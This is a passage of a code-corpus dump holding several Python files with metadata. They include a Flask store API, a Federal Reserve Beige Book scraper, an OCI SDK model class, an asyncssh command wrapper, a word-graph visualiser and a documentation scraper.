47, "usage_type": "call"}, {"api_name": "models.CustomUser.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.CustomUser", "line_number": 47, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 58, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "70233744486", "text": "from flask import Flask, jsonify, abort\r\nfrom sqlalchemy import create_engine\r\nfrom 
sqlalchemy.orm import sessionmaker\r\n\r\nfrom models import *\r\n\r\n\r\ndb_file = 'store.db'\r\nengine = create_engine('sqlite:///{}'.format(db_file), convert_unicode=True)\r\nSession = sessionmaker(bind=engine)\r\nsession = Session()\r\n\r\napp = Flask(__name__)\r\n\r\n@app.teardown_appcontext\r\ndef shutdown_session(exception=None):\r\n '''Clean-up when the the app context is torn down'''\r\n session.close()\r\n\r\n@app.errorhandler(404)\r\ndef not_found(error):\r\n response = jsonify({'code': 404, 'message': 'Not found!'})\r\n response.status_code = 404\r\n return response\r\n\r\n@app.route('/api/stores', methods=['GET'])\r\ndef get_stores():\r\n '''Return all stores'''\r\n stores = session.query(Store).all()\r\n return jsonify([{'id': s.id, 'name': s.name} for s in stores])\r\n\r\n@app.route('/api/brands', methods=['GET'])\r\ndef get_brands():\r\n '''Return all brands'''\r\n brands = session.query(Brand).all()\r\n return jsonify([{'id': b.id, 'name': b.name} for b in brands])\r\n\r\n@app.route('/api/products/<int:brand_id>', methods=['GET'])\r\n@app.route('/api/products/<int:brand_id>/<int:offset>', methods=['GET'])\r\n@app.route('/api/products/<int:brand_id>/<int:offset>/<int:limit>', methods=['GET'])\r\ndef get_products_of_brand(brand_id, offset=0, limit=5):\r\n '''Return all products given a brand'''\r\n try:\r\n brand = session.query(Brand).filter(Brand.id == brand_id).first()\r\n except:\r\n abort(404)\r\n\r\n return jsonify([\r\n {'id': p.id, \r\n 'name': p.name, \r\n 'store': {\r\n 'id': p.stores.id,\r\n 'name': p.stores.name\r\n }\r\n } for p in brand.products[offset:limit]])\r\n\r\n@app.route('/api/product/<int:product_id>/<int:store_id>', methods=['GET'])\r\ndef get_product_details(product_id, store_id):\r\n '''Return product information given a product and brand'''\r\n try:\r\n product = session.query(Product).filter(Product.id == product_id).filter(Product.store_id == store_id).one()\r\n except:\r\n abort(404)\r\n\r\n return jsonify({\r\n 'id': product.id,\r\n 'name': product.name,\r\n 'type': product.type,\r\n 'price': float(product.price),\r\n 'position': product.page_position,\r\n 'page': product.page_number,\r\n 'category': {\r\n 'id': product.categories.id,\r\n 'name': product.categories.name,\r\n },\r\n 'brand': {\r\n 'id': product.brands.id,\r\n 'name': product.brands.name,\r\n }\r\n })\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)", "repo_name": "flipvrijn/scraped-data-to-structured-db", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 2592, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 9, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 10, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.abort", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "17123029416", "text": "# -*- coding: utf-8 -*-\r\n\r\nfrom __future__ import print_function\r\nfrom bs4 import 
BeautifulSoup\r\nfrom urllib.request import Request, urlopen\r\nfrom fake_useragent import UserAgent\r\nfrom datetime import datetime\r\nimport re\r\nimport pandas as pd\r\nimport pickle\r\nimport threading\r\nimport sys\r\nimport os\r\n\r\n\r\nclass BeigeBooks(object):\r\n \"\"\"\r\n This class firstly checks that the input arguments are of the correct type, followed\r\n by extracting the release month of each previous Beige Book. Subsequently, the Beige Book\r\n data is extracted, placing the results into a Pandas DataFrame.\r\n\r\n :param main_url: the Federal Reserve Open Monetary Policy (FOMC) website URL. (str)\r\n :param beige_book_url: the Beige Book directory page. (str)\r\n :param start_year: the year which the user wishes to begin parsing from. (int)\r\n :param historical_split: the year considered as historical (historical vs current archive list). (int)\r\n :param verbose: boolean determining printing during scraping. (bool)\r\n :param thread_num: the number of threads to use for web scraping. (int)\r\n :return: dataset: a DataFrame containing meeting minutes, indexed by meeting date. (pd.DataFrame)\r\n\r\n \"\"\"\r\n\r\n def __init__(self,\r\n main_url: str = 'https://www.federalreserve.gov',\r\n beige_book_url: str = 'https://www.federalreserve.gov/monetarypolicy/beige-book-default.htm',\r\n start_year: int = 1996,\r\n historical_split: int = 2019,\r\n verbose: bool = True,\r\n thread_num: int = 10\r\n ):\r\n\r\n if not all(isinstance(v, str) for v in [main_url, beige_book_url]):\r\n raise TypeError(\"The 'main_url' and 'beige_book_url' arguments must be string types.\")\r\n if not all(isinstance(v, int) for v in [start_year, historical_split, thread_num]):\r\n raise TypeError(\"The 'start_year', 'historical_split' and 'thread_num' arguments must be integer types.\")\r\n if not isinstance(verbose, bool):\r\n raise TypeError(\"The 'verbose' argument must be a boolean type.\")\r\n\r\n self.main_url = main_url\r\n self.beige_book_url = beige_book_url\r\n self.start_year = start_year\r\n self.HISTORICAL_SPLIT = historical_split\r\n self.verbose = verbose\r\n self.THREAD_NUM = thread_num\r\n self.dataset = None\r\n self.links = None\r\n self.dates = None\r\n self.articles = None\r\n\r\n def _obtain_links(self, start_year: int):\r\n \"\"\"\r\n The helper function constructs the links of all FOMC meetings,\r\n beginning at the start_year' argument, and continuing to the current\r\n date.\r\n\r\n :param start_year: the year at which the link construction begins. 
(int)\r\n \"\"\"\r\n if not isinstance(start_year, int):\r\n raise TypeError(\"The 'start_year' variable must be an integer type.\")\r\n\r\n if self.verbose:\r\n print(\"Constructing links between {} and {}\".format(start_year, datetime.today().year))\r\n\r\n self.links = []\r\n beige_book_socket = self._urlopen_with_ua(self.beige_book_url)\r\n soup = BeautifulSoup(beige_book_socket, 'html.parser')\r\n beige_books = soup.find_all('a', href=re.compile('^/monetarypolicy/beigebook\\\\d{6}.htm'))\r\n self.links = [beige_book.attrs['href'] for beige_book in beige_books]\r\n\r\n if start_year <= self.HISTORICAL_SPLIT:\r\n for year in range(start_year, self.HISTORICAL_SPLIT + 1):\r\n beige_book_annual_url = self.main_url + '/monetarypolicy/beigebook' + str(year) + '.htm'\r\n beige_book_annual_socket = self._urlopen_with_ua(beige_book_annual_url)\r\n bb_annual_soup = BeautifulSoup(beige_book_annual_socket, 'html.parser')\r\n historical_statements = bb_annual_soup.findAll('a', text='Statement')\r\n for historical_statement in historical_statements:\r\n self.links.append(historical_statement.attrs['href'])\r\n\r\n @staticmethod\r\n def _urlopen_with_ua(url: str) -> str:\r\n \"\"\"\r\n This helper function adds user agent credentials to the\r\n request, enabling the script to interact with the Federal\r\n Reserve website.\r\n\r\n :param url: the url to be queried, without a user agent. (str)\r\n :return: urlopen(req): the url opened using a user agent. (str)\r\n \"\"\"\r\n if not isinstance(url, str):\r\n raise TypeError(\"The 'url' argument must be a string type.\")\r\n\r\n ua = UserAgent()\r\n req = Request(url)\r\n req.add_header(\"user-agent\", ua.chrome)\r\n return urlopen(req)\r\n\r\n @staticmethod\r\n def _find_date_from_link(link: str) -> str:\r\n \"\"\"\r\n This helper function determines the FOMC meeting date from the relevant link.\r\n The function firstly checks that the link is a string type, followed by parsing\r\n the string to generate the date. The date string is subsequently returned.\r\n\r\n :param link: the link string to be parsed for dates. (str)\r\n :return: date: the date string parsed from the link string. (str)\r\n \"\"\"\r\n if not isinstance(link, str):\r\n raise TypeError(\"The 'link' argument must be a string type.\")\r\n\r\n date = re.findall('[0-9]{6}', link)[0]\r\n if date[4] == '0':\r\n date = \"{}/{}/{}\".format(date[:4], date[5:6], \"01\")\r\n else:\r\n date = \"{}/{}/{}\".format(date[:4], date[4:6], \"01\")\r\n return date\r\n\r\n def _add_article(self, link: str, index: int = None):\r\n \"\"\"\r\n This helper function adds the related minutes for 1 link to the instance variable.\r\n Multithreading stipulates that the articles must be stored in the correct order, where\r\n the 'index' argument is the index in the article to add to.\r\n\r\n :param link: the link to be opened and data generated for. (str)\r\n :param index: the index associated with the link. 
(int)\r\n \"\"\"\r\n if not isinstance(link, str):\r\n raise TypeError(\"The 'link' argument must be a string type.\")\r\n if not isinstance(index, (type(None), int)):\r\n raise TypeError(\"The 'index' argument must either be a None type or a integer type.\")\r\n\r\n if self.verbose:\r\n sys.stdout.write(\".\")\r\n sys.stdout.flush()\r\n\r\n self.dates.append(self._find_date_from_link(link))\r\n if len(link) <= 35:\r\n beige_book_output_socket = self._urlopen_with_ua(self.main_url + link)\r\n beige_book_output = BeautifulSoup(beige_book_output_socket, 'html.parser')\r\n paragraph_delimiter = beige_book_output.findAll('p')\r\n self.articles[index] = \"\\n\\n\".join([paragraph.get_text().strip() for paragraph in paragraph_delimiter])\r\n else:\r\n beige_book_output_socket = self._urlopen_with_ua(link)\r\n beige_book_output = BeautifulSoup(beige_book_output_socket, 'html.parser')\r\n paragraph_delimiter = beige_book_output.findAll('p')\r\n self.articles[index] = \"\\n\\n\".join([paragraph.get_text().strip() for paragraph in paragraph_delimiter])\r\n\r\n def _multithreaded_article_retrieval(self):\r\n \"\"\"\r\n This helper function returns all articles associated with each link. The function firstly\r\n initiates the threads, as specified by the 'thread_num' argument passed to the class. The\r\n function uses each thread to efficiently extract the articles and store the outcome.\r\n \"\"\"\r\n if self.verbose:\r\n print(\"Retrieving articles.\")\r\n\r\n self.dates, self.articles = [], [''] * len(self.links)\r\n jobs = []\r\n index = 0\r\n while index < len(self.links):\r\n if len(jobs) < self.THREAD_NUM:\r\n thread = threading.Thread(target=self._add_article, args=(self.links[index], index,))\r\n jobs.append(thread)\r\n thread.start()\r\n index += 1\r\n else:\r\n thread = jobs.pop(0)\r\n thread.join()\r\n\r\n for thread in jobs:\r\n thread.join()\r\n\r\n for row in range(len(self.articles)):\r\n self.articles[row] = self.articles[row].strip()\r\n\r\n def find_beige_books(self):\r\n \"\"\"\r\n This function acts as the main public function of the class, returning the Beige Books\r\n by efficiently extracting the information from the FOMC Website. The function then places each\r\n Beige Book into a Pandas DataFrame, indexed by the meeting date string.\r\n\r\n :return: dataset: a Pandas DataFrame containing the meeting minutes, indexed by meeting date. (pd.DataFrame)\r\n \"\"\"\r\n self._obtain_links(self.start_year)\r\n if self.verbose:\r\n print(\"Extracting the past {} Beige Books.\".format(len(self.links)))\r\n self._multithreaded_article_retrieval()\r\n\r\n self.dataset = pd.DataFrame(self.articles, index=pd.to_datetime(self.dates)).sort_index()\r\n self.dataset.columns = ['Beige_Book']\r\n\r\n if self.verbose:\r\n sys.stdout.write(\".\")\r\n sys.stdout.flush()\r\n\r\n for i in range(len(self.dataset)):\r\n self.dataset.iloc[i, 0] = self.dataset.iloc[i, 0].replace('\\n', ' ')\r\n self.dataset.iloc[i, 0] = self.dataset.iloc[i, 0].replace('\\r', ' ')\r\n self.dataset.iloc[i, 0] = self.dataset.iloc[i, 0].replace('\\t', '')\r\n self.dataset.iloc[i, 0] = self.dataset.iloc[i, 0].replace('\\xa0', '')\r\n\r\n return self.dataset\r\n\r\n def pickle_data(self, directory: str) -> bool:\r\n \"\"\"\r\n This public function acts as a main public function, for extraction and pickling of\r\n the extracted data to the 'directory' argument passed. The function checks that the\r\n directory argument is a string type, followed by checking if the directory ends with\r\n the appropriate extension. 
The folder is then created if necessary, followed by the\r\n data being written to the pickle file, where a boolean is returned to denote success / failure\r\n of the file write operation.\r\n\r\n :param directory: the directory to which the file should be written. (str)\r\n :return: bool: determines if the file was written correctly. (bool)\r\n \"\"\"\r\n if not isinstance(directory, str):\r\n raise TypeError(\"The 'directory' argument must be a string type.\")\r\n if not directory.endswith((\".pkl\", \".pickle\")):\r\n raise TypeError(\"The pickle file directory should end with a '.pkl' or '.pickle' extension.\")\r\n if not os.path.exists(os.path.split(directory)[0]):\r\n if self.verbose:\r\n print(\"Creating {} directory.\".format(os.path.split(directory)[0]))\r\n os.mkdir(os.path.split(directory)[0])\r\n output_dataset = self.find_beige_books()\r\n try:\r\n with open(directory, \"wb\") as pickle_output:\r\n pickle.dump(output_dataset, pickle_output)\r\n return True\r\n except(NotImplementedError, FileNotFoundError):\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n dataset = BeigeBooks().find_beige_books()\r\n \r\n", "repo_name": "David-Woroniuk/FedTools", "sub_path": "FedTools/Beigebook.py", "file_name": "Beigebook.py", "file_ext": "py", "file_size_in_byte": 11217, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.today", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 71, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 75, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 76, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 83, "usage_type": "call"}, {"api_name": "fake_useragent.UserAgent", "line_number": 101, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 102, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 104, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 119, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 141, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 141, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 142, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 142, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 147, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 152, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 170, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 197, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 197, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 201, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 201, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 202, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 202, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path", "line_number": 228, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 230, "usage_type": "call"}, {"api_name": "os.path", "line_number": 230, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 231, "usage_type": "call"}, {"api_name": 
"os.path.split", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 235, "usage_type": "call"}]} +{"seq_id": "31582441159", "text": "from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass SecureAccessControlRule(object):\n \"\"\"\n The access control rule for SECURE_ACCESS network type selection.\n \"\"\"\n\n #: A constant which can be used with the ip_notation property of a SecureAccessControlRule.\n #: This constant has a value of \"IP_ADDRESS\"\n IP_NOTATION_IP_ADDRESS = \"IP_ADDRESS\"\n\n #: A constant which can be used with the ip_notation property of a SecureAccessControlRule.\n #: This constant has a value of \"CIDR\"\n IP_NOTATION_CIDR = \"CIDR\"\n\n #: A constant which can be used with the ip_notation property of a SecureAccessControlRule.\n #: This constant has a value of \"VCN\"\n IP_NOTATION_VCN = \"VCN\"\n\n #: A constant which can be used with the ip_notation property of a SecureAccessControlRule.\n #: This constant has a value of \"VCN_OCID\"\n IP_NOTATION_VCN_OCID = \"VCN_OCID\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new SecureAccessControlRule object with values from keyword arguments.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param ip_notation:\n The value to assign to the ip_notation property of this SecureAccessControlRule.\n Allowed values for this property are: \"IP_ADDRESS\", \"CIDR\", \"VCN\", \"VCN_OCID\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type ip_notation: str\n\n :param value:\n The value to assign to the value property of this SecureAccessControlRule.\n :type value: str\n\n :param vcn_ips:\n The value to assign to the vcn_ips property of this SecureAccessControlRule.\n :type vcn_ips: str\n\n \"\"\"\n self.swagger_types = {\n 'ip_notation': 'str',\n 'value': 'str',\n 'vcn_ips': 'str'\n }\n\n self.attribute_map = {\n 'ip_notation': 'ipNotation',\n 'value': 'value',\n 'vcn_ips': 'vcnIps'\n }\n\n self._ip_notation = None\n self._value = None\n self._vcn_ips = None\n\n @property\n def ip_notation(self):\n \"\"\"\n **[Required]** Gets the ip_notation of this SecureAccessControlRule.\n The type of IP notation.\n\n Allowed values for this property are: \"IP_ADDRESS\", \"CIDR\", \"VCN\", \"VCN_OCID\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The ip_notation of this SecureAccessControlRule.\n :rtype: str\n \"\"\"\n return self._ip_notation\n\n @ip_notation.setter\n def ip_notation(self, ip_notation):\n \"\"\"\n Sets the ip_notation of this SecureAccessControlRule.\n The type of IP notation.\n\n\n :param ip_notation: The ip_notation of this SecureAccessControlRule.\n :type: str\n \"\"\"\n allowed_values = [\"IP_ADDRESS\", \"CIDR\", \"VCN\", \"VCN_OCID\"]\n if not value_allowed_none_or_none_sentinel(ip_notation, allowed_values):\n ip_notation = 'UNKNOWN_ENUM_VALUE'\n self._ip_notation = ip_notation\n\n @property\n def value(self):\n \"\"\"\n **[Required]** Gets the value of this SecureAccessControlRule.\n The associated value of the selected IP notation.\n\n\n :return: The value of this SecureAccessControlRule.\n :rtype: str\n \"\"\"\n return self._value\n\n @value.setter\n def 
value(self, value):\n \"\"\"\n Sets the value of this SecureAccessControlRule.\n The associated value of the selected IP notation.\n\n\n :param value: The value of this SecureAccessControlRule.\n :type: str\n \"\"\"\n self._value = value\n\n @property\n def vcn_ips(self):\n \"\"\"\n Gets the vcn_ips of this SecureAccessControlRule.\n A comma-separated IP or CIDR address for VCN OCID IP notation selection.\n\n\n :return: The vcn_ips of this SecureAccessControlRule.\n :rtype: str\n \"\"\"\n return self._vcn_ips\n\n @vcn_ips.setter\n def vcn_ips(self, vcn_ips):\n \"\"\"\n Sets the vcn_ips of this SecureAccessControlRule.\n A comma-separated IP or CIDR address for VCN OCID IP notation selection.\n\n\n :param vcn_ips: The vcn_ips of this SecureAccessControlRule.\n :type: str\n \"\"\"\n self._vcn_ips = vcn_ips\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n", "repo_name": "oracle/oci-python-sdk", "sub_path": "src/oci/data_flow/models/secure_access_control_rule.py", "file_name": "secure_access_control_rule.py", "file_ext": "py", "file_size_in_byte": 4820, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 345, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oci.util.value_allowed_none_or_none_sentinel", "line_number": 89, "usage_type": "call"}, {"api_name": "oci.util.formatted_flat_dict", "line_number": 142, "usage_type": "call"}, {"api_name": "oci.decorators.init_model_state_from_kwargs", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "38246114623", "text": "from __future__ import annotations\n\nfrom logging import Logger, getLogger\nfrom types import TracebackType\nfrom typing import Any, Optional, Type\n\nimport asyncssh\nfrom asyncssh import (\n ProcessError,\n SSHClientConnection,\n SSHCompletedProcess,\n SSHKnownHosts,\n)\n\n_LOGGER = getLogger(__name__)\n\nfrom ._command_line import CommandLine\n\n\nclass SshCommandLine(CommandLine):\n \"\"\"SSH-based command line used to send commands to the device.\"\"\"\n\n def __init__(\n self,\n *,\n host: str,\n port: int,\n host_key: str,\n username: str,\n logger: Optional[Logger] = None,\n ) -> None:\n super().__init__()\n self._host = host\n self._port = port\n self._host_key = host_key\n self._username = username\n if logger is None:\n logger = _LOGGER\n self._logger = logger\n self._conn: Optional[SSHClientConnection] = None\n\n async def run(self, command: str, **kwargs: Any) -> str:\n \"\"\"Run command and wait for the response.\"\"\"\n if self._conn is None:\n raise RuntimeError(\"Call __aenter__ before you issue a command\")\n try:\n process: SSHCompletedProcess = await self._conn.run(command, check=True)\n except ProcessError as exc:\n self._logger.debug(f\"stdout:\\n{exc.stdout}\")\n self._logger.debug(f\"stderr:\\n{exc.stderr}\")\n raise\n response = process.stdout\n assert isinstance(response, str)\n return response\n\n @property\n def _known_hosts(self) -> SSHKnownHosts:\n data = f\"{self._host} {self._host_key}\\n\"\n return SSHKnownHosts(data)\n\n async def __aenter__(self) -> SshCommandLine:\n conn = asyncssh.connect(\n self._host,\n self._port,\n known_hosts=self._known_hosts,\n username=self._username,\n )\n self._conn = await conn.__aenter__()\n return self\n\n async def __aexit__(\n self,\n exc_type: Optional[Type[BaseException]],\n exc_value: Optional[BaseException],\n traceback: Optional[TracebackType],\n ) -> None:\n 
assert self._conn is not None\n        await self._conn.__aexit__(exc_type, exc_value, traceback)\n", "repo_name": "sbtinstruments/wright", "sub_path": "wright/command_line/_ssh_command_line.py", "file_name": "_ssh_command_line.py", "file_ext": "py", "file_size_in_byte": 2243, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "_command_line.CommandLine", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 30, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 40, "usage_type": "name"}, {"api_name": "asyncssh.SSHClientConnection", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 42, "usage_type": "name"}, {"api_name": "asyncssh.SSHCompletedProcess", "line_number": 47, "usage_type": "name"}, {"api_name": "asyncssh.ProcessError", "line_number": 48, "usage_type": "name"}, {"api_name": "asyncssh.SSHKnownHosts", "line_number": 59, "usage_type": "call"}, {"api_name": "asyncssh.SSHKnownHosts", "line_number": 57, "usage_type": "name"}, {"api_name": "asyncssh.connect", "line_number": 62, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 75, "usage_type": "name"}, {"api_name": "types.TracebackType", "line_number": 75, "usage_type": "name"}]}
+{"seq_id": "9668506799", "text": "import json\nimport networkx as nx\nfrom pyvis.network import Network\n\n# Load the word paths from the json file\nwith open(\"word_paths.json\", 'r') as f:\n    word_paths = json.load(f)\n\n# choose 100 words\nword_paths = {k: word_paths[k] for k in list(word_paths)[:100]}\n\n# Create a directed graph\nG = nx.DiGraph()\n\n# Add nodes and edges to the graph\nfor word, paths in word_paths.items():\n    for path_word in paths:\n        G.add_edge(word, path_word)\n\n# Convert the NetworkX graph into a PyVis network\npyvis_graph = Network(notebook=True, select_menu=True)\npyvis_graph.from_nx(G)\n\n# Provide the nodes with labels\nfor node in pyvis_graph.nodes:\n    node[\"title\"] = f\"Word: {node['id']}\"\n    node[\"label\"] = node[\"id\"]\n\n\npyvis_graph.show_buttons(filter_=['physics']) \n\n#turn physics off\npyvis_graph.toggle_physics(False)\n\n# Save the graph to an HTML file\npyvis_graph.show(\"word_graph.html\")\n", "repo_name": "samshapley/SemanticGPT", "sub_path": "semantic_network/pyvis_html_network.py", "file_name": "pyvis_html_network.py", "file_ext": "py", "file_size_in_byte": 885, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 7, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 13, "usage_type": "call"}, {"api_name": "pyvis.network.Network", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "5595400265", "text": "# encoding: utf-8\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom config import *\nimport os, re\n\n\ndef get_first_level_title(div):\n    \"\"\"\n    Traverse the first-level titles, saving each title and its link\n    \"\"\"\n    global contents, current_level\n    for li in div.find_all(\"li\", {\"class\": \"toctree-l1\"}):\n        item = {}\n        # 1. 
Title\n        item[\"chapter\"] = li.a.string\n        # 2. Add the level, to make sorting easier\n        href = li.a[\"href\"]\n        if href == COPYRIGHT_HREF or href == PREFACE_HREF:\n            item[\"level\"] = (0, 0)\n            current_level = 0\n        else:\n            current_level += 1\n            item[\"level\"] = (current_level, 0)\n        # 3. Chapter page url\n        item[\"url\"] = BASE_URL + href\n        contents.append(item)\n\n        # Get the sub-chapter titles\n        get_second_level_title(li.find_all(\"li\", {\"class\": \"toctree-l2\"}))\n\n\ndef get_second_level_title(lis):\n    \"\"\"\n    Traverse the sub-chapter titles, saving each title and its link\n    \"\"\"\n    global contents, current_level\n    sub_level = 1\n    for li in lis:\n        item = {}\n        # 1. Title\n        item[\"chapter\"] = li.a.string\n        # 2. Add the level, to make sorting easier\n        item[\"level\"] = (current_level, sub_level)\n        sub_level += 1\n        # 3. Chapter page url\n        item[\"url\"] = BASE_URL + li.a[\"href\"]\n        contents.append(item)\n\n\ndef save_to_html(item):\n    # 0. Fetch the html content\n    html = urlopen(item[\"url\"])\n    bs_obj = BeautifulSoup(html, \"html.parser\")\n\n    # 1. Get the main content body\n    rst_content = bs_obj.find(\"div\", {\"class\": \"rst-content\"})\n    # 2. Remove the navigation and footer information\n    rst_content.find(\"div\", {\"role\": \"navigation\"}).decompose()\n    rst_content.footer.decompose()\n\n    # 3. For sub-chapters, replace H1 with H2 and H2 with H3\n    level = item[\"level\"][0]\n    sub_level = item[\"level\"][1]\n\n    if level != 0:\n        for h2 in rst_content.find_all(\"h2\"):\n            h2.name = \"h3\"\n        for h1 in rst_content.find_all(\"h1\"):\n            h1.name = \"h2\"\n\n    # 4. Add the header and footer\n    body_part = rst_content.prettify()\n    if sub_level != 0:\n        header_part = HTML_HEADER % bs_obj.h2.get_text()\n    else:\n        header_part = HTML_HEADER % bs_obj.h1.get_text()\n    footer_part = HTML_FOOTER\n\n    # Save to file\n    # return header_part + body_part + footer_part\n    file_name = correct_file_name(str(level) + \"-\" + str(sub_level) + \"-\" + item[\"chapter\"] + \".html\")\n    file_name = DOWNLOAD_PATH + os.sep + file_name\n    with open(os.path.abspath(file_name), \"w\", encoding=\"utf-8\") as f:\n        f.write(header_part + body_part + footer_part)\n\n\ndef make_download_dir():\n    if os.path.exists(DOWNLOAD_PATH) == False:\n        os.makedirs(DOWNLOAD_PATH)\n\n\ndef correct_file_name(file_name):\n    rex = re.compile(r'[\\\\/:*?\"<>|\\r\\n]+')\n    invalid_strs = rex.findall(file_name)\n    if invalid_strs:\n        for invalid_str in invalid_strs:\n            file_name = file_name.replace(invalid_str, '_')\n    return file_name\n\n# def write_to_html()\n\nif __name__ == \"__main__\":\n\n    # item = {\n    #     \"chapter\": \"1.1 解压序列赋值给多个变量\",\n    #     \"url\": \"http://python3-cookbook.readthedocs.io/zh_CN/latest/c01/p01_unpack_sequence_into_separate_variables.html\",\n    #     \"level\": (1, 1),\n    # }\n    # make_download_dir()\n    # save_to_html(item)\n    make_download_dir()\n    contents = []\n    html = urlopen(CONTENTS_URL)\n    bs_obj = BeautifulSoup(html, \"html.parser\")\n    get_first_level_title(bs_obj.find(id=\"python-cookbook-3rd-edition-documentation\"))\n\n    count = 1\n    for item in contents:\n        print(item[\"level\"], item[\"chapter\"], item[\"url\"], sep=\" : \")\n        if item[\"level\"][0] == 0 or item[\"level\"][0] == 16:\n            save_to_html(item)\n        count += 1\n", "repo_name": "icescut/Crawl-Python-Cookbook", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3737, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "urllib.request.urlopen", "line_number": 54, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 55, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, 
